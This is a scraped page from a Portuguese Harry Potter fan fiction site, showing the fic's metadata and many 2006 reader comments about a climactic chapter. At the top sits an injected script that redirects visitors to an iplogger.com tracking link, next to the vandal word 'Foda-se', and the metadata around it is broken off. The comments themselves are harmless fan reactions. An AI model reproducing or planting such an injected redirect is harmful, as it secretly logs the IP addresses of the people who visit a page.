<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>
Foda-se
","headline":"","url":"https://www.floreioseborroes.net/fics/ver/5005","inLanguage":"pt-BR","genre":"Fan fiction","isAccessibleForFree":true,"description":"Essa fic contém spoilers, dicas, pistas, insinuações, palpites e mais sobre Harry Potter and the Half-Blood Prince. Os personagens e o enred","image":"http://storage.msn.com/x1pFUxp6NG29bW3Uy8xnoGhE3lfnFozsOj27OUjuAgYgzcUOsZ6EQx96JvNJhv6aleexlwABNPPtGP-h9pKtxxztqk09YsUIa25GQDUTXGp657FjIUVEwKu0Xleo521HD0yUElEHid32hDdS-q22xqjPg","datePublished":"2005-08-05","dateModified":"2017-04-25","author":{"@type":"Person","name":"Sônia Sag","url":"https://www.floreioseborroes.net/users/ver/3634"},"publisher":{"@type":"Organization","name":"Floreios e Borroes","url":"https://www.floreioseborroes.net"},"aggregateRating":{"@type":"AggregateRating","ratingValue":4.92,"ratingCount":21437,"bestRating":5,"worstRating":1}}
Foda-se
Comentários (2867)
Sonia, to só na espera do proximo capitulo, vc ja sabe qdo vai postar??? Avisa na comunidade do orkut... espero q seja em breve... Ahhhhh, e vi uma coisa, a fic agora está em 1º entre as mais votadas, merecidamente, já q sua fic é maravilhosa, a melhor q eu já li... Parabénsssss!!!!!!!!!!!!!!!!!
2006-06-05Te azarar? Nunca!. Descepcionada com o cap? Menos ainda? Menina, agora, refeita do susto da primeira leitura posso fazer um comentário decente. Nunca vi um capítulo de fic tão bom!!!!!!!!! O Harry inundado por magia negra... Gina lançada longe, Rony calmo. Acredito que ainda há esperança pelas próprias falas do Harry, primeiro ele, já possuído pela magia das trevas ainda lembra de libertar os amigos, depois da destruição do Tom ele pede (mesmo que de forma grossa) para as pessoas se afastarem dele pois "olha no que ele se tornou" e finalmente pede (de novo de forma grossa) para o Rony tirar as meninas de lá. Ou seja ele não quer fazer mal a ninguém, senão teriam lançado maldições para todo o lado. Acho que o gesto com a Gina foi inconsciente, ele queria afasta-la. Mas tenho certeza que ele vai voltar. Volto a falar o que disse na comunidade do orkut: aquele trecho da música no início do cap quer dizer algo, não me lembro de vc ter começado nenhum cap assim. O Harry fugiu pra se livrar das forças da treva e acho que ele volta, se não no último cap, talvez no epilogo. Só mais uma coisa: você já tem outra fic em mente, não tem? O que vai ser da gente sem as Fic da Sônia?
2006-06-05IMPERIUS! Eu ORDENo que você faça o harry voltar! Ele tem de acabar com a influência do voldemort! Pelamor de Deus num me mata do core! HARRY VOLTA HARRY VOLTA HARRY VOLTA HARRY VOLTA HARRY VOLTA HARRY VOLTA HARRY VOLTA HARRY VOLTA HARRY VOLTA HARRY VOLTA HARRY VOLTA HARRY VOLTA HARRY VOLTA HARRY VOLTA HARRY VOLTA HARRY VOLTA
2006-06-0534 = O.O "uau!"
2006-06-05por favor!! colok a 2ª parte looogo!! ;} bjoo.. ;** Obs¹: tava perfeito esse cap..!
2006-06-05"ABALOU, ABALOU, SACUDIU, BALANÇOU..." Soninha tive que ler 5 paginas de comentários. Como eu disse quando lí o cap. fiquei com dó dos outros fãs por antecipação. Sabia que vc ia ter que segurar esse rojão, é quase como se fosse o próprio harry tendo de assimilar a energia da morte do malvadão. Parabéns amiga pelo sucesso, vc merece muito. Aproveito o momento pra fazer uma pressão básica... Não é o que os outros estão pensando, hihihi Onde está meu autógrafo em papel especial pra poder colocar em moldura. Vou continuar precionando até receber ;) Bjos.
2006-06-05NOTA MIL! Esse capítulo ofi muito bom, bacana, interessante mas... CADÊ O RESTO? Eu to louco pra saber o que houve com o harry. Vc é fantástica, não esqueça. Se puder, passe na minha fic: Harry Potter e o Dogma da Verdade. PARABÉNS! Eu te adoro e poste logo, pelo amor de Deus. Beijos e até mais.
2006-06-04termina essa fic pelo amor de merlin num vou conseguir aguardar ateh sei lah quando
2006-06-04......... *respira fundo* GENTE ALGUEM ME DIGA O Q FOI ESSE CAP!!! sonia vc totalmente me fez tremer da cabeça aos pés e murmurar coisas desconexas enqto lia!!! mew PRECISO comentar cena por cena... bom, harry chega à sala d dumbledore e logo pergunta por gina... ufa, q bom q ela tah bem, mas sabia q voldemort naum ia acabar com as coisas assim taum rápido... ele gosta d uma cerimônia heheh... o harry tirando os horcruxes um por um foi ótimo, engraçado como voldemort ainda subestima ele... harry mantendo a calma no começo... diz q o q o cara d cobra oferece eh mto poko... entaum akele desgraçado usa o golpe mais baixo q jah vi!!! COMO ASSIM ELE FALA DO SIRIUS DESSE JEITO!?!? coitado do harry, ateh o mais corajoso e forte dos seres treme nas bases com um golpe desse =P mas digam o q kiser, q eu to com o dumbledore: naum eh possivel trazer os mortos d volta à vida!!! mew ele tava totalmente tentando enganar o harry, ainda bem q ele se recuperou e recusou a oferta... =/ ufa! enqto isso coisas estranhas acontecendo... confesso q tava taum nervosa sobre o q ia acontecer q nem me tokei o q era akela movimentaçào toda... =P e entaum o rony aparece!!! e acaba com nagini, o último horcrux!!! vivaaa! mas aih voldemort paralisa eles, e ainda revela mione tentando salvar a gina... nossa mas qdo ele arremessou o rony longe, comecei "ah naum, o rony naum, pelo amor d deus, naum, nem o harry, nem a mione, naum mata eleeees" e assim por diante... hehehehe! mas meu deus como o voldemort eh sujo! mew akabei d descobrir q essa eh a palavra mais adequada pra defini-lo! SUJO! mas como o harry eh bozinho mas naum BOBO, começa a jogar sujo com riddle tb... yeah! a hora q ele falou d merope foi otima, foi a vingança por riddle ter tocado na ferida do sirius... =/ hunf! alias td o q o harry disse nessa hora foi digno d final d harry potter, meu deus... enqto isso, total desespero com medo q acontecesse alguma coisa com eles... o.o e mewwww a hora q o riddle fez akilo com harry, ivadindo a mente dele com akelas coisas horriveis!!! creeeedo! por um momento pensei q o harry tivesse morrido (naaaaum!), mas vi q a barra d rolagem ainda tava no meio (hahaha), entaum ainda tinham surpresas... o q aconteceu com o harry?!?!?! começa a última parte da batalha, e meu deus, q batalha... deu ateh medo do harry! e lord voldemort FINALMENTE foi morto... com a ajuda d seu próprio horcrux... maravilhoso! ^^ mas mewwwwww... e agora? pq o harry fikou taum estranho? serah q eh permanente??? nossa q doh da gina... mas acho q o harry naum tava em condição d responder por seus atos... e ele foi embora!!!!!!!! putz! kero soh ver como o rony vai contar a todos... agora, soniaa... diz q o harry volta! diz q sim, diz, diz! nem q seja daki a alguns anos, desde q volte como era antes! akele trecho d música eh uma dica neh? mas naum consegui pensar em nada q fizesse sentido... bom, naum to nem aih pra onde ele vai, contanto q VOLTE! sonia esse cap foi TUDO!!! um final digno! mas dah uma tristeza d pensar q em poko tempo naum vamos mais esperar ansiosamente por novidades... =( minha empolgação com o final eh diretamente proporcional ao tamanho do comment!!! ^^ hehehe bom, ateh o próximo cap entaum! *nervosaaaa* bjus!
2006-06-04bah que absurdo....como que tu faz isso com agente.... bah terminar o caminho assim do nada... no meio.... pelo amor de deus... demais o capitulo.... bah perfeito.... continua e posta o proximo o mais rapido possivel.... tah demais a fic.... quero saber o q vai acontecer com eles... com o Harry e com a Gina... se eles vao ficar juntos... como que vai ficar.... bah continua e posta o mais rapido possivel... bah eh demais a fic e to ansioso esperando o proximo capitulo... bjaun
2006-06-04